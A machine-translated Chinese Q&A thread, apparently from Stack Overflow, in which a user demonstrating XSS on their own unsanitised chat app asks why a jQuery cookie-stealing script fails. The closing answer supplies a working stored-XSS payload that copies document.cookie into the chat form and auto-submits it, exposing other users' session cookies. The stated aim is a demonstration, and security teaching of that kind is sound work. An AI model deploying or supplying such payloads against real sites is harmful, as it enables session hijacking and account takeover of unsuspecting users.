我有一个小型网络聊天应用程序,它接受并输入名称和输入密码,并且还有一个提交输入并将其粘贴到一个组。像这样:
<form method="post" action="whatever.php">
<input type="text" name="input_name" value="Your Name"></input>
<input type="text" name="input_text" value="Your Text"></input>
<input type="submit" value="Submit"></input>
</form>
无论如何,没有消毒和典型的XSS如
<script>alert('hi')</script>
完美适用于页面加载。但是,我想演示会话窃取,所以我写了这个:
<script>
$("input[name='input_name']").value = "User";
$("input[name='input_text']").value = document.cookie;
$("input[type='submit']").click();
</script>
每个jQuery语句都可以从控制台完美运行,但是它们一起在页面加载时不会执行。我想让它能够显示两个用户,一个看到对方的会话信息。我在xss尝试中遗漏了什么?提前谢谢!
答案 0 :(得分:1)
您提供的脚本未触发任何请求,因为它不处理任何表单操作。尝试使用XMLHTTP requests触发提交请求。
答案 1 :(得分:0)
这有效:
<script>var x=document.forms[0];x.input_name.value='user';
x.input_text.value=document.cookie;x.submit();</script>